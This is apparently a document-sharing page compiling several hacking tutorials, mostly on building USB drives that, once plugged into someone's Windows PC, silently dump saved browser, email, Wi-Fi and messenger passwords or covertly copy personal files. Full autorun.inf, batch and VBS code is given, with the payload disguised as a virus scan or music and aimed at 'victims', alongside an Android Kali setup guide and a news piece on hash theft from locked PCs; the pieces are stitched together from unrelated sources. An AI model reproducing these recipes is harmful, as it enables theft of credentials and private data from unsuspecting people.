50% found this document useful (2 votes)
3K views29 pages

How To Create A Portable Hacking Device

The document describes how to create a portable hacking device disguised as a USB drive that can automatically extract passwords and other sensitive information from computers. It provides step-by-step instructions to download password extraction software, configure autorun files on the USB drive to launch the software silently upon insertion, and copy extracted password files back to the USB drive. While presented as an educational demonstration of computer security vulnerabilities, the device could enable unauthorized access to users' private information if misused. The document cautions that the method should only be used with permission to help others and not violate privacy.

Uploaded by

robi doco
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
50% found this document useful (2 votes)
3K views29 pages

How To Create A Portable Hacking Device

The document describes how to create a portable hacking device disguised as a USB drive that can automatically extract passwords and other sensitive information from computers. It provides step-by-step instructions to download password extraction software, configure autorun files on the USB drive to launch the software silently upon insertion, and copy extracted password files back to the USB drive. While presented as an educational demonstration of computer security vulnerabilities, the device could enable unauthorized access to users' private information if misused. The document cautions that the method should only be used with permission to help others and not violate privacy.

Uploaded by

robi doco
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1/ 29

How to create a portable hacking device.

Yes. you heard it right. A portable hacking device that will be a pen drive from
outside, but a powerful hacking tool from inside. There’s nothing to hype about this, it
is just a few commands that will help you to access each and every password stored
on the users’ PC or Laptop.
Some will call it hacking and some will call it stealing. But to be more clear, the way
you use this device will define your deed. If you are helping someone with it then it
will not be considered as stealing, but if you are doing this to disrespect someone’s
privacy then my friend results can be terrible.

So, let’s start with this simple hack.

How to create a portable hacking device.


Things required to begin with:
1. Pen Drive
2. PC/Laptop
3. Web Browser Pass View.
To download Web Browser Pass View, click here.
After that, follow these steps:

 1: Download Web Browser Pass View Zip file from the link provided.


 2: Insert the USB drive and quick format it as NTFS.
 3: Create a New Folder inside the USB Drive, and name it as USB.
 4: Extract the Zip file in that folder.
 5: Open the Notepad and then copy the following commands:

” @echo off
cls
start \usb\WebBrowserPassView.exe
/shtml 1.html “
after you have copied this command, save the file as USB Driver.bat.
 6: Open the Notepad again and copy the following commands:
” [autorun]
open=usbdriver.bat
Action=Perform a Virus Scan “
after copying this, save the file as Autorun.inf.
Step 7: Copy both files, Autorun.inf and USBdriver.bat into your pen drive.
This will create you a portable hacking device. Insert it into the victim’s folder and
notice the magic. Just Kidding, allow access to Virus check, after you see this pop-up
just click Yes. After tapping, you will get a screen like this:

Just press Ctrl+A and then Ctrl+S to save the file into your pen drive. Now open the
note pas file that you saved. Kudos, you have now the list of all the password’s saved
on your victim’s computer.

OTE: Sometimes the Autorun file doesn’t work. In that case, open the pen drive
partition and then double click on the USB drive. After that, just tap Ctrl+Aand
then Ctrl+S. This will save the list of passwords.
This simple hack is very simple, to begin with, as you can see. The one with the basic
knowledge of computers can also make this device. Also, please don’t use this hack to
exploit people’s privacy. Instead, use this to help others in need.

13
Shares

How to Make an Auto Hacking Wardrive


When it comes to computer security, sometimes it's good to know
what it is that you're trying to protect yourself from. In this video, I'm
going to cover the AutoRun feature in Windows and why, for security
reasons, you should never use it. To prove my point, I'm going to
show you how to make a USB drive that exploits the autorun feature
to automatically download and save a users information just by
plugging it into a USB port.

To do this project, you are going to need:


- U3 usb drive, such as a sandisk cruizer,
- Access to a Windows XP machine.

What makes a U3 usb drive unique is that it emulates a CD rom drive


so that it can autorun it's "launchpad" whenever you plug it into your
computer. This is useful because Windows will not allow programs to
autorun straight from a USB drive, but it will allow programs to autorun
from CD drives and since a U3 usb drive shows up as both, we can
use this feature to autorun our USB drive

Step 2: Download Universal Customizer

Backup everything that's currently on your USB drive. Then go to this


website: http://www.u3community.com/viewtopic.php?t=434 and
download the "Universal Customizer" program. This program is going
to allow us to replace the U3 Launchpad application with our own
autolaunching application. Unfortunately, this program only works on
Windows XP, so you'll have to have an XP machine to run this. When
it's through downloading, extract all of the files to your desktop and
open up the "U3CUSTOM" folder. This folder is where we're going to
create our custom autolaunching program

Step 3: Creating the Autorun and Launch Files


The first thing that we want to do is create an "autorun" file, so right
click within the folder and select "new > text document". Rename it as
"autorun.inf" and then double click on it to open it up. Type:
[AutoRun]
open=launch.exe -a

Then click File > Save. This will autorun a program called "launch.exe"
that we're going to make right now. So right click in the folder again
and select "new>textdocument" and rename it "launch.bat". Then right
click on it and select "edit". Now type:

\usb.vbs

Save, and close it. This will tell it to open a file called "usb.vbs" that we
will create in a second. But first we need to convert the batch file to an
executable that Windows can autorun.

Step 4: Converting BAT to EXE

To convert launch.bat to an executable, go to this


website http://download.cnet.com/Bat-To-Exe-Converter/3000-
2069_4-10555897.html and download the Bat to EXE converter. Open
it up and run the exe file. For the "Batch file" field, point to the
"launch.bat" file that you created. Then click "compile". You should
now see a "launch.exe" file in your "U3Custom" folder.

Now let's create the usb.vbs file. This will find the drive letter of the
USB drive so that we can automatically save stuff to it. So, create
another new text document and rename it to "usb.vbs". Then right
click on it and select edit. You want to type in this code:
Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
Const USBDRIVE=1
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
'Get USB drive letter
For Each oDrive In oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then


WScript.Echo "found usb at", oDrive.DriveLetter
oUsbDrive = oDrive.DriveLetter & ":\"
shell.run oDrive.DriveLetter & ":\PasswordFox.exe"
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
newDst=oDst&"\"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
'Recursive copy, uncomment if needed
' For Each oDir In objFolder.SubFolders
' CopyFiles oDir.Path, oDst
' Next
End Sub
Basically what this script does is scan the computer for a USB drive
and then executes a file called "batch.bat" from that USB drive. Once
you have that done, click save and exit and now we can burn this to
our U3 drive.
Add TipAsk QuestionCommentDownload
Step 6: Burn the Files to the Virtual U3 
CD

Go back up to the main "universal customizer" directory and click


"isocreate.cmd". This will turn our folder into an iso file that we will
then put on the USB drive. Now click on "universal_customizer.exe".
Just follow the instructions in the program and it will set up your U3
drive to run our custom created launcher. When it's through, click
done. You will need to pull out your usb drive and plug it back in and it
may give you an error, but that's because we haven't put any
programs on it, which we will do in the next step.

Step 7: Loading the Hacking Programs

2 More Images

You can find some good programs at "nirsoft.net" that are good for
retrieving passwords and information. Such as PasswordFox. Just
extract the files and copy them to your USB drive. Lastly, we need to
create a USB file that runs the program silently and stores the data it
collects back on the USB drive. So right click in the USB drive and
create a new text file and rename it "batch.bat". Then right click on it
and select "edit". To launch the program type:
start %~dp0PasswordFox.exe /shtml %~dp0firefox.html

you want to replace "PasswordFox.exe" with whatever program you


downloaded. And according to the nirsoft website that we downloaded
it from, if we want to save the password results as an html file, we can
type /shtml firefox.html. Now to make sure that it reads it and saves it
to the USB drive, we need to put "%~dp0" before both filenames. Now
save the file and test it out. Put it in a computer that has autorun
enabled and within a second, you should have an html file saved to
your USB drive with the users information.

Protection
The best way to protect yourself from this type of hack is to disable
any type of autorun feature. To enable/disable autorun in windows xp,
go to "start > run" type gpedit.msc and hit enter. Select "Administrative
Templates > System" and then double click on "Turn off autoplay" to
enable/disable it. In vista and 7 go to start and type "gpedit.msc",
select administrative templates > Windows Components" and double
click on "Autoplay policies" to enable or disable it.

PeterStavrou.com
Blog

Services

Marketing Tools

Shop

Testimonials

About

About Me

About This Site

Contact

No products in the cart.

How To Make A Hacking USB Like Mr. Robot

Usually I write about Internet Marketing and share with you different techniques you
can use to grow your business, but today I decided to switch it up a little and create
more of a “fun” post, like how to make a hacking USB similar to the one used in Mr.
Robot.

For those who don’t know, Mr. Robot is American TV series about a young, anti-
social computer hacker. In Season 2, Episode 6, one of the characters inserts a USB
into a computer allowing the hackers to take control of the entire system.
The hacking USB you are going to make will quickly grab every password saved on
the computer and save it to your USB.

This also includes Microsoft product keys and WiFi passwords.

Please note that I am not creating this tutorial so you can harm others, I am creating it
so you can see how easy it is for someone to steal your passwords if you save them.
The hacking USB is also extremely useful for IT technicians or for users who always
seem to forget their passwords.

Also, this will only work computers running Windows and the files on there will be
marked as malicious by virus scanners.

How To Make A Hacking USB


To create your hacking USB you will need to create a batch file and download
a few applications included in a single package.
A batch file (also known as batch script) allows you to automate tasks and we
are going to use it to run all of the applications and export their data to text
files.
1. 1. Create a new folder and call it Hacking USB.
2. 2. Inside the folder create a folder called Tools.
3. 3. Go to Nirsoft and download the package which includes all of the
major password-recovery tools with command-line support.
4. Extract the files into the Tools folder using a program like 7-Zip.

5. Create a Text Document inside the Tools folder by right-clicking on the white
space, clicking on New and selecting Text Document.

6. Rename the Text Document to Script.bat to turn it into a batch file.

If you can’t see the .txt extension at the end of your new document then you will need
to disable the feature Hide file extensions on your computer by using this guide.
7. Right-click on your batch file and click on Edit.

The file should then open up in Notepad.

I always recommend you use Note++ or Atom when doing any type of coding but for
this tutorial Notepad will do.

8. Copy and paste the below code in the notepad

:: www.PeterStavrou.com
@echo off
:: Echo makes the command prompt window blank. You can try remove this to see what happens.

mkdir log
:: Creates a folder called log only if the folder does not already exist.

start BulletsPassView.exe /stext .\log\BulletsPassView-%computername%.txt


start ProduKey.exe /stext .\log\ProduKey-%computername%.txt
start ProtectedStorage.exe /stext .\log\ProtectedStorage-%computername%.txt
start RouterPassView.exe /stext .\log\RouterPassView-%computername%.txt
start WirelessKeyView.exe /stext .\log\WirelessKeyView-%computername%.txt
start ChromePass.exe /stext .\log\ChromePass-%computername%.txt
start Dialupass.exe /stext .\log\Dialupass-%computername%.txt
start iepv.exe /stext .\log\iepv-%computername%.txt
start mailpv.exe /stext .\log\mailpv-%computername%.txt
start mspass.exe /stext .\log\mspass-%computername%.txt
start netpass.exe /stext .\log\netpass-%computername%.txt
start PasswordFox.exe /stext .\log\PasswordFox-%computername%.txt
start WebBrowserPassView.exe /stext .\log\WebBrowserPassView-%computername%.txt
:: The above runs each application and exports the results as text documents using the naming convention
ApplicationName-ComputerName
1. 9. Save the Notepad.

Now if you run the Script.bat file you will notice that a folder called log has
been created with a list of passwords.
 
Additional Steps (Optional)
If you’re like me and like to keep everything neat and tidy then the below
steps are recommended.
1. Right-click the Script.bat file and select Create shortcut.
2. Move the shortcut you created from the folder Tools to the Folder Hacking
USB.
3. Copy and paste the files onto a USB device.

Conclusion
As you can see it is very easy for someone to create a hacking USB to steal all
your passwords which it is why you should be very careful when saving
sensitive credentials such as bank details on your computer. Even though a
lot of malicious programs are smart enough to bypass virus scanners, it is
still recommended that you have one installed.
If you’re an IT technician, this USB is definitely very handy to have.
Also, if you are someone that forgets your passwords all the time then this is
a great way to find them.
 
HOW-TO GUIDES   WINDOWS HACKS

How to Hack Passwords Using a USB


Drive
As we all know, Windows stores most of the passwords which are used on a
daily basis, including instant messenger passwords such as MSN, Yahoo,
AOL, Windows messenger etc. Along with these, Windows also stores
passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete
passwords of many browsers like IE and Firefox.

There exists many tools for recovering these passswords from their stored
places. Using these tools and a USB pen-drive, you can create your own
rootkit to sniff passwords from any computer. We need the following tools
to create our rootkit:

MessenPass : Recovers the passwords of most popular Instant Messenger


programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite
4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian,
Miranda, and GAIM.
Mail PassView : Recovers the passwords of the following email programs:
Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only),
Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts),
IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts
(HotMail, Yahoo!, Gmail), if you use the associated programs of these
accounts.

IE Passview : IE PassView is a small utility that reveals the passwords stored
by Internet Explorer browser. It supports the new Internet Explorer 7.0, as
well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView : Recovers all passwords stored inside the


Protected Storage, including the AutoComplete passwords of Internet
Explorer, passwords of Password-protected sites, MSN Explorer Passwords,
and more.

PasswordFox : PasswordFox is a small password recovery tool that allows


you to view the user names and passwords stored by Mozilla Firefox Web
browser. By default, PasswordFox displays the passwords stored in your
current profile, but you can easily select to watch the passwords of any
other Firefox profile. For each password entry, the following information is
displayed:

Record Index, Web Site, User Name, Password, User Name Field and
Password Field.

Preparing Your USB Drive for Password


Hacking:
Here is a step by step procedure to create the password hacking toolkit:

You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executable


files (.exe files) onto your USB Pendrive.
ie: Copy the files
– mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe i
nto your USB Drive.
2. Create a new Notepad and write the following text into it:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text
Document.txt to autorun.inf. Nowcopy the autorun.inf file onto your
USB pen-drive.
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt start mailpv.exe
/stext mailpv.txt start iepv.exe /stext iepv.txt start
pspv.exe /stext pspv.txt start passwordfox.exe /stext
passwordfox.txt
Save the Notepad and rename it from New Text
Document.txt to launch.bat. Copy the launch.bat file to your USB
drive.
Now your rootkit is ready and you are all set to sniff the passwords.
You can use this pen-drive on on any computer to sniff the stored
passwords. Just follow these steps:
1. Insert the pen-drive and the auto-run window will pop-up. (This
is because, we have created an auto-run pen-drive).
2. In the pop-up window, select the first option (Perform a Virus
Scan).
3. Now all the password recovery tools will silently get executed in
the background (This process takes hardly a few seconds). The
passwords get stored in the .TXT files.
4. Remove the pen-drive and you’ll see the stored passwords in
the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.

NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

How to Turn an Android Phone into a


Hacking Device Without Root
 BY DISTORTION
  02/01/2019 8:12 AM
  03/06/2019 6:55 AM
 ANDROID FOR HACKERS
With just a few taps, an Android phone can be weaponized into a covert
hacking device capable of running tools such as Nmap, Nikto, and Netcat — all
without rooting the device.

UserLAnd, created by UserLAnd Technologies, is a completely free Android


app that makes installing Linux distributions quick and effortless, without any
rooting. With this, it's possible to run an ARM64 Debian operating system
alongside the current Android OS. Sometimes referred to as "AARCH64," this
ARM architecture is the same used by the Kali Linux Raspberry Pi ARM
images, which makes it easy to import Kali's tool repository. And best of all, the
UserLAnd team recently added a dedicated Kali filesystem so importing
repositories won't be necessary for all users.
All of the created filesystems are easily disposable. While many Kali tools work
without issues, UserLAnd is still a new project and may cause some tools ( like
Nmap) to break or fail when executing certain commands. It's worth
mentioning, these issues will likely be resolved in the near future.
 Don't Miss: How to Hack a Mac Password Without Changing It
For the technically inclined, UserLAnd utilizes custom scripts and executables
that allow it to create the Debian and Ubuntu filesystems. One example of this
is PRoot, an open-source software that implements functionalities similar
to chroot. PRoot allows you to execute programs with an alternative root
directory, no root needed. Normally, a user-space application will communicate
directly with the Kernel through system calls. With UserLAnd, PRoot is running
in the background, interpreting these system calls, and it will perform and
manipulate them when necessary to emulate users and permissions in the
filesystem.
We'll start by installing an SSH client, which will be the primary app for
interacting with the Debian OS. Then, I'll walk through some OS setup tips and
importing the Kali Linux repository to really turn Android into a hacking device.
As some readers may know, Kali Linux is based on the Debian operating
system, so importing their repository won't cause anything to break or become
unreliable.

Install the ConnectBot App (Optional)


UserLAnd recently added a built-in SSH functionality, so this step is no longer
required. However, third-party SSH clients can still be used if preferred.

ConnectBot is an open-source SSH client designed for Android smartphones,


which allows you to securely connect with SSH servers. This will be the
primary way of interacting with the new UserLAnd Debian operating system. If
you don't use or have access to Google Play, ConnectBot is available via
the F-Droid repository.
JuiceSSH is also a very good option to use instead of ConnectBot since it has
more features, so you can use that if you'd rather. ConnectBot is more regularly
updated and easier for beginners, so we went with that.
Step 2Install the UserLAnd App
I've already covered what UserLAnd is and does above, so I won't go over
anything else in detail here. The important thing is that you install it, and you
can do so using either Google Play or F-Droid.

 Play Store Link: UserLAnd (free)


 F-Droid Link: UserLAnd (free)
Disclaimer: UserLAnd does have limitations. Without root access, Android's Wi-Fi
interface can't be switched into monitor mode, so traditional Wi-Fi hacking tools like
Aircrack-ng won't work. However, there's still a lot that can be done with UserLAnd,
as you'll see in future guides, and running Kali without rooting or wiping the Android
OS is no easy achievement. So be sure to give the UserLAnd app a good rating on
Google Play — the developers totally deserve some positive feedback.

Step 3Create a New Filesystem

When the installation is complete, open UserLAnd, and view the "Apps" tab. Refresh
the tab and wait a few minutes for the distributions to populate.
The Kali Linux OS has recently been added to the list of available distributions. Select
"Kali" or "Debian" and the UserLAnd app will prompt for credentials. Create a
username, password, and VNC password. The "Password" will allow access to the
SSH server started when the filesystem is finished installing. The "VNC Password"
won't be used in this tutorial but is required to proceed with the installation.
UserLAnd will then download the necessary executables and scripts from its
GitHub repository that are used to create the filesystems. The time it takes to
download and extract the required assets will vary based on the Android CPU
and internet connection speed. The installation process took up to 20 minutes
to complete in some tests, so be patient.
In my first attempt, UserLAnd returned the following "Could not extract
filesystem. Something went wrong " error. Removing and reinstalling the
UserLAnd application seemed to resolve the issue. If this error persists, open a
new GitHub issue.
Step 4Interact with the Filesystem
When the installation is complete, head over to the "Sessions" tab, and select
the newly created option. UserLAnd will automatically attempt to open
ConnectBot and ask "Are you sure you want to continue connecting?" Tap
"Yes," and enter the password created in the previous step.
At this point, syncing a Bluetooth keyboard to the phone will make setting up
the OS easier, but isn't required. If you don't use a Bluetooth keyboard, I
recommend installing Hacker's Keyboard from the Play Store, and you'll see
why as we continue.

update the OS
The first thing to do after installing a new operating system on your Android
phone is making sure the system is fully up to date. This can be done by first
using su to create a root shell. Next, use the apt-get update && apt-get dist-
upgrade command.
distortion@localhost:~$ su
root@localhost: /home/distortion# apt-get update && apt-get dist-upgrade
Ign:1 http://cdn-fastly.deb.debian.org/debian stable InRelease
Get:2 http://cdn-fastly.deb.debian.org/debian stable-updates InRelease [91.0 kB]
Hit:3 http://cdn-fastly.deb.debian.org/debian stable Release
Get:4 http://cdn-fastly.deb.debian.org/debian stable Release.gpg [2434 B]
Get:5 http://cdn-fastly.deb.debian.org/debian stable-updates/main arm64 Packages
[5096 B]
Get:6 http://cdn-fastly.deb.debian.org/debian stable-updates/main Translation-en
[4512 B]
Get:7 http://cdn-fastly.deb.debian.org/debian stable/main Translation-en [5393 B]
Get:8 http://cdn-fastly.deb.debian.org/debian stable/contrib arm64 Packages [29.9 kB]
Get:9 http://cdn-fastly.deb.debian.org/debian stable/contrib Translation-en [45.9 kB]
Get:10 http://cdn-fastly.deb.debian.org/debian stable/non-free arm64 Package [50.8
kB]
Get:11 http://cdn-fastly.deb.debian.org/debian stablenon-free Translation-en [80.6
kB]
Fetched 5714 kB in 31s (183 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree... Done
Calculating upgrade... Done
The following packages will be upgraded:
tzdata
1 upgraded, 0 newly intalled, 0 to remove and 0 not upgraded.
Need to get 270 kB of archives.
After this operation, 1024 B of additional disk space will be used.
Do you want to continue? [Y/n]
In the case of the above output, there's only one package that needed updating,
but this might not always be true.
 Don't Miss: Top 10 Things to Do After Installing Kali Linux
Step 6Install Essential Software
This new filesystem is extremely bareboned and doesn't include very much
software by default. Below are a few packages recommended for everyday
Debian and Kali users. Some packages aren't required but will make it easier to
follow along in future articles where Android is used as the primary hacking
device.

1. screen — Screen is a terminal multiplexer that allows users to run and


alternate between several terminal sessions simultaneously. This is one of
the most vital packages to install when using UserLAnd. Android phones
don't handle prolonged SSH sessions well and tend to break connections
for no apparent reason. Such breakage can cause running commands to
fail with no way of reconnecting to the session to view the progress. Use
Screen to maintain persistent shell sessions.
2. net-tools — Net-tools is a suite of tools containing ifconfig, netstat, route,
and several other useful networking applications.
3. netcat — Netcat is a feature-rich UNIX utility designed to be a reliable
tool for creating TCP and UDP connections. Netcat can be used to create
and interact with simple macOS backdoors .
neofetch — Neofetch (shown in the cover photo of this article) is a cross-platform system information
gathering tool. It conveniently displays system specifications alongside the distribution logo. There's no
real function for this package other than showing-off the distribution to coworkers and friends or
creating cover photos for WonderHowTo. Neofetch is a little buggy with UserLAnd distros, but you may
want to know how I created the cover photo, so I'm including it here.

gnupg — GnuPG (sometimes referred to as gpg) is generally used for encrypting files and securing email
communications. Some installer scripts (like Metasploit) use gpg in order to import their software
signing keys. It's possible to manually install Metasploit without gpg, but it will make the process less
complicated.

curl — cURL is a command line tool capable of downloading files over HTTP and other popular protocols.
This is a useful tool to have for downloading files from the internet.

wget — Like cURL, wget is a command line tool used to download files from the internet. Some
developers prefer wget over cURL, so it's helpful to keep both installed and available.

git — Git is a popular version control software and is commonly used to clone (download) GitHub
projects. Git is often recommended by Null Byte users.
nano — Nano is a command line text editor. Nano will make editing files via SSH more convenient. If Vim
or Emacs is preferred, download those text-editors instead (or in addition to nano).

The above packages can be installed using the apt-get command.

apt-get update && apt-get install net-tools netcat neofetch gnupg curl wget git nano
screen
Step 7Import the Kali Linux Repository (Conditional)
If you installed the Kali OS in Step 3, this step can be skipped. For Debian OS
users, importing the Kali repository into your distribution isn't mandatory.
However, doing so will allow for quick installations of applications such
as sqlmap, Commix, Bettercap, Nikto, dnsmap, and hundreds of packages that
can't be found in Debian's default repositories.
To start importing the Kali Linux repository, use nano to add Kali's repository to
the /etc/apt/sources.list file.
nano /etc/apt/sources.list
Add the below line to the bottom of the file (shown below), then use Ctrl + X to
exit and save the changes. ConnectBot has on-screen buttons for keys
like Ctrl and Shift. Alternatively, a Bluetooth keyboard or the Hacker's Keyboard
app will come in handy for exiting the nano terminal.

deb http://http.kali.org/kali kali-rolling main contrib non-free


Then, add the Kali signing key using the following wget command.
wget -q -O - https://www.kali.org/archive-key.asc | apt-key add -
If the command was successful, the terminal will return "OK" (shown below).
Finally, update the APT cache using the apt-get update command.
root@localhost:/home/distortion# wget -q -O - https://www.kali.org/archive-key.asc |
apt-key add -
OK
root@localhost:/home/distortion# apt-get update
Ign:1 http://cdn-fastly.deb.debian.org/debian stable InRelease
Hit:3 http://cdn-fastly.deb.debian.org/debian stable-updates InRelease
Hit:4 http://cdn-fastly.deb.debian.org/debian stable Release
Ign:2 http://ftp.halifax.rwth-aachen.de/kali kali-rolling InRelease
Get:6 http://ftp.acc.umu.se/mirror/kali.org/kali kali-rolling Release [29.6 kB]
Get:7 http://ftp.acc.umu.se/mirror/kali.org/kali kali-rolling Release.gpg [833 B]
Get:8 http://ftp.acc.umu.se/mirror/kali.org/kali kali-rolling/main arm64 Packages
[16.4 MB]
64% [8 Packages 9415 kB/16.4 MB 57%] 546 kB/s 13s
 Don't Miss: How to Create an Undetectable Payload
More Weaponized Android Coming Soon
With UserLAnd, turning Android's into hacking devices is easy. While Android is
slower at processing data than Raspberry Pis, it still makes a great, easily
concealed offensive tool capable of running Kali software.
In upcoming articles, I'll show how to hack webs

ites, Wi-Fi passwords, and Windows 10 using only Kali on Android. If you have


any requests for Kali software you'd like to see running in Android, be sure to
leave a comment below.

Stealing Data from Locked


PCs Possible Using USB
Device

Reading Time: 3 minutes
This should come as a surprise, a mild or perhaps not-so-mild shock, to those many
people who lock their computer screens while temporarily moving away. Well, your
system, your data is not secure when you do so. It’s just a USB device that’s needed to
steal critical data from your locked system. This might be news for many, as regards PC
security.
Security expert Rob Fuller has now explained that it’s very easy to copy an OS account
password hash from a locked computer using a special USB device, and that too in a
few seconds. This hash can then be cracked or used directly in network attacks. Rob,
who has over a decade’s experience covering all aspects of information security, has
explained this in detail in a post that he has made on his website www.room362.com.

Rob Fuller has proved this using a flash-drive-size computer device called USB Armory
that costs $155, but he has also stated that it can be done using other cheaper devices
as well. Says Rob Fuller- “I started off with a USB Armory ($155) but below I’ll show you
how to do this with a Hak5 Turtle ($49.99) as well.”

How it works

All that it takes is to plug in a device that masquerades as a USB Ethernet adapter in
such a way that it becomes the primary network interface on the locked computer that’s
targeted. This is rather easy because firstly, even if a computer is locked, OSs
automatically start installing newly connected USB devices, including Ethernet cards,
and secondly, the OSs automatically configure such devices as the default gateways.

Says Rob Fuller in his website post- “USB is Plug-and-Play. This means that even if a
system is locked out, the device still gets installed. Now, I believe there are restrictions
on what types of devices are allowed to install at a locked out state on newer operating
systems (Win10/El Capitan), but Ethernet/LAN is definitely on the white list.”

When a new network card gets installed, the Operating System would configure it to
automatically detect the network settings. This is done through the DHCP (Dynamic
Host Configuration Protocol) and anyone wishing to steal data from a locked computer
can have a rogue computer at the other end of the Ethernet cable to act as a DHCP
server. When it’s a USB Armory that’s used, it becomes easier because USB Armory
works like a computer on a stick, powered via USB and running on Linux. Thus, there is
no need to attach a separate rogue machine.

Thus, the attacker happens to gain control of a computer’s network settings using the
USB device. He thus also can control the system’s DNS (Domain Name System)
responses and is able to configure a rogue internet proxy through the WPAD (Web
Proxy Autodiscovery) protocol and more. Thereby he attains an advantageous man-in-
the-middle position, which he can utilize to intercept and tamper with the computer’s
network traffic.

As Rob Fuller says- “Computers are constantly creating traffic, even if you don’t have
any browsers or applications open, and most computers trust their local network…”
Thus, it becomes possible for the attacker who makes his entry into the system using
the USB device to extract the account name and the hashed password. The capturing
of credentials from a locked system in this manner can be done in a short time. Rob
Fuller says he needed only about 13 seconds for his test attack.
The stolen password hashes would either be in the in NT LAN Manager (NTLM) version
2 or NTLMv1 format, based on the targeted computer and its configuration. NTLMv2
hashes, though harder to crack, can be cracked if the password is not too complex and
the hacker uses a powerful password cracking rig. Moreover, there are some instances
where relay attacks against network services can be made possible by using NTLM
hashes directly without having to know plaintext passwords.

So, next time you move away leaving your computer locked, remember that someone
can very easily get away with your credentials and shatter your concepts regarding PC
security.

How to secretly copy (steal) files from a


computer to a USB Flash drive
in Teck Talk

Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a
moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway. 
To get the notes you can either break into his house at night, an accomplice keeps you hanging
by a rope from the roof while you deliberately copy the files to your flash drive taking care not
to let your feet touch the floor. Or you can walk into his room one morning and say with a
feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash
drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy
the songs you brought to his PC to complete the act.

Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.

STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun] 
icon=drive.ico 
open=launch.bat 
action=Click OK to Run 
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon.
It’s useful for social engineering purposes like enticing the user to click a file on the drive by
making it looks like a game or something. 
The “action=” command is optional too but sometimes when the autorun launches it may ask
the user what to open. Depending on what you put here the user will be instructed to click Ok
or run the file. This code acts as a backup just in case the user is asked what to open. This is not
required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open
when prompted. This code will execute when the drive letter is clicked on. 

STEP 2
Open Notepad again and copy-paste the following lines
@echo off 
:: variables 
/min 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids" 
@echo off 
cls
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos
folder to the Flash drive under a folder called “all”. This is the section of the code you will need
to edit depending on what you want to copy. 
The first file path "%USERPROFILE%\pictures" – is the target. 
The second file path "%drive%\all\My pics" – is the destination.

STEP 3
Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the
batch file is processing.

STEP 4
Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive
then loads it with file.bat so file.bat is run with code from vbs file. 
STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the
icon file if needed. Also create a folder named “all” where the contents are to be copied
automatically. You can call this folder by any name, but then you need to reflect the changes
you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing
it out on your victim. It works flawlessly.

You might also like